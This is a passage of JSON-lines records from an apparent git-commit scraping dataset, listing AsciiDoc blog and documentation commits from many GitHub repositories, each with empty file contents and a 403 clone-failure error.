2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a387a57b3b98aa3c086eebbef293d358ca46811","subject":"Update 2017-04-28-Grammar-Nazi.adoc","message":"Update 2017-04-28-Grammar-Nazi.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-28-Grammar-Nazi.adoc","new_file":"_posts\/2017-04-28-Grammar-Nazi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38c4d3138af7f06db3eadae72e7a01ccff843f4a","subject":"add 404 page","message":"add 404 page\n","repos":"bibryam\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"404.adoc","new_file":"404.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ba7e88f2f661392b8c8da96894cd76a52cf2e93","subject":"Update 2016-10-27-Demo.adoc","message":"Update 2016-10-27-Demo.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Demo.adoc","new_file":"_posts\/2016-10-27-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f4a09c777c58f513b5427aa2502e199db31441c","subject":"Update 2013-5-12-Test-Notes.adoc","message":"Update 2013-5-12-Test-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-5-12-Test-Notes.adoc","new_file":"_posts\/2013-5-12-Test-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc7bca5ad6722e4ad7c27cc097e37ee1fa02889","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb8be9b7ebf9df6c2abc60bc6e728edca07fd422","subject":"Update 2017-10-19-HTML-Diff.adoc","message":"Update 2017-10-19-HTML-Diff.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-19-HTML-Diff.adoc","new_file":"_posts\/2017-10-19-HTML-Diff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fcdd0b7df03690865a9e716a752ab5c41687e02","subject":"2016-07-18-Stockholm.adoc","message":"2016-07-18-Stockholm.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-18-Stockholm.adoc","new_file":"_posts\/2016-07-18-Stockholm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f247fd02ae2e378f73f73e9901fb61decc0e482d","subject":"Update 2019-05-29.adoc","message":"Update 2019-05-29.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2019-05-29.adoc","new_file":"_posts\/2019-05-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecda8dd0dbeffba42e8ccb7ac2c43f00a5e6d497","subject":"y2b create post 3 Cool Tech Deals - #9","message":"y2b create post 3 Cool Tech Deals - #9","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-20-3-Cool-Tech-Deals--9.adoc","new_file":"_posts\/2015-09-20-3-Cool-Tech-Deals--9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a5f84b4409efeccca61d6b70d71a41a840d817","subject":"Update 2015-10-22-north_india_trip_tax.adoc","message":"Update 2015-10-22-north_india_trip_tax.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-22-north_india_trip_tax.adoc","new_file":"_posts\/2015-10-22-north_india_trip_tax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"635b44afa39797d791184184e0132448c3287d18","subject":"Update 2017-09-18-UIUCTF-2017-Crypto.adoc","message":"Update 2017-09-18-UIUCTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e11df82804694ff53917a669ef2ccec3bd7dfba","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"959ad10650d7d2d9c5ff1e8ac4f54e0957005f27","subject":"y2b create post Massive 38-inch Monitor = Mind Blown!","message":"y2b create post Massive 38-inch Monitor = Mind Blown!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-22-Massive-38inch-Monitor--Mind-Blown.adoc","new_file":"_posts\/2016-09-22-Massive-38inch-Monitor--Mind-Blown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"654f9da22b790c6a36ac7e3d3f69231cb852fead","subject":"Update 2017-05-07-Book-Review-Flowers-of-Algernon.adoc","message":"Update 2017-05-07-Book-Review-Flowers-of-Algernon.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-05-07-Book-Review-Flowers-of-Algernon.adoc","new_file":"_posts\/2017-05-07-Book-Review-Flowers-of-Algernon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6716d2ad775b22d800020b803bb8705e8973373","subject":"Update 2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","message":"Update 
2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","new_file":"_posts\/2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d822a642b0d3af72a4b43c7e4ad4d9600343cfea","subject":"Document how to run a single docs test","message":"Document how to run a single docs test\n","repos":"JervyShi\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,henakamaMSFT\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,mikemccand\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,gmarz\/elasticsearch,nilabhsagar\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,liweinan0423\/elasticsearch,spiegela\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,C-Bish\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,C-Bish\/elasticsearch,mortonsykes\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,artnowo\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,winstonewert\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,gmarz\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elastic
search,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,bawse\/elasticsearch,mjason3\/elasticsearch,elasticdog\/elasticsearch,MisterAndersen\/elasticsearch,gmarz\/elasticsearch,gmarz\/elasticsearch,mohit\/elasticsearch,MaineC\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,wuranbo\/elasticsearch,robin13\/elasticsearch,mortonsykes\/elasticsearch,ZTE-PaaS\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,mortonsykes\/elasticsearch,scottsom\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,geidies\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,JervyShi\/elasticsearch,MisterAndersen\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,naveenhooda2000\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,StefanGor\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,coding0011\/elasticsearch,JervyShi\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,IanvsPoplicola\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,StefanGor\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elastic
search,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,Helen-Zhao\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,Shepard1212\/elasticsearch,glefloch\/elasticsearch,yanjunh\/elasticsearch,LeoYao\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,LewayneNaidoo\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,shreejay\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,mikemccand\/elasticsearch,fforbeck\/elasticsearch,mikemccand\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,yanjunh\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,rlugojr\/elasticsearch","old_file":"docs\/README.asciidoc","new_file":"docs\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc0730eeadabf00c8283d894fc63ca438b995893","subject":"Added the CIP Template","message":"Added the CIP 
Template\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP-Template.adoc","new_file":"cip\/CIP-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6171d86ee3e1471cb6f057cd9172ebb79a05914","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/10\/10\/deref.adoc","new_file":"content\/news\/2022\/10\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3b9f53f48a5e8d6f2cd156810666e9610975d6a6","subject":"add content for querying metric definitions","message":"add content for querying metric definitions\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfd6210d95457a8c7d969598978a69508ea2cb60","subject":"doc\/users-guide: add time API section","message":"doc\/users-guide: add time API section\n\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Ivan Khoronzhuk <15ad2a232c436ab54d1b78ef06a09c4cd03911f0@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6daa3b9a3e8dd73dbb9cc9cb9cc3480a338fae07","subject":"compare both reflection API PHP5 and Reflect 2","message":"compare both reflection API PHP5 and Reflect 2\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/features-compared.asciidoc","new_file":"docs\/features-compared.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"229139f76e8f8250e23766ea2b0827869d3db9c8","subject":"add Developing Patches page from community wiki","message":"add Developing Patches page from community wiki\n","repos":"clojure\/clojure-site","old_file":"content\/community\/developing_patches.adoc","new_file":"content\/community\/developing_patches.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"213caaa50747ecee9b70782aa98bcb1aecbfe141","subject":"y2b create post ULTIMATE GAMING SETUP - THE DIVISION","message":"y2b create post ULTIMATE GAMING SETUP - THE DIVISION","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-18-ULTIMATE-GAMING-SETUP--THE-DIVISION.adoc","new_file":"_posts\/2016-03-18-ULTIMATE-GAMING-SETUP--THE-DIVISION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f21744edbf84c84332b1e31de78a1be6a1d437fe","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b6d607796767605578bf620a6118ca3235492c4","subject":"usage example for apoc.cypher.runMany","message":"usage example for apoc.cypher.runMany\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runMany.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runMany.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a664646732aaaab47015424ad06b017b04e6a359","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c21a9282f5850a504bf82325bb065a8fb0f5cc96","subject":"adding clarifications, more coming","message":"adding clarifications, more coming\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"ed14542ef15b3ba876ecd985269645a04ad95456","subject":"doc: update napatech support by mlilja","message":"doc: update napatech support by mlilja\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77eadefa15cf976bd45d322ef3bc66726fadd1c8","subject":"KUDU-1375: [docs] Remove \"binaries\" in the Build from Source section","message":"KUDU-1375: [docs] Remove \"binaries\" in the Build from Source section\n\n- make install does not install the Kudu binaries\n\nChange-Id: I5b1e7337cdd9f04eea1c2b4da3d27b9815553121\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12060\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Adar Dembo 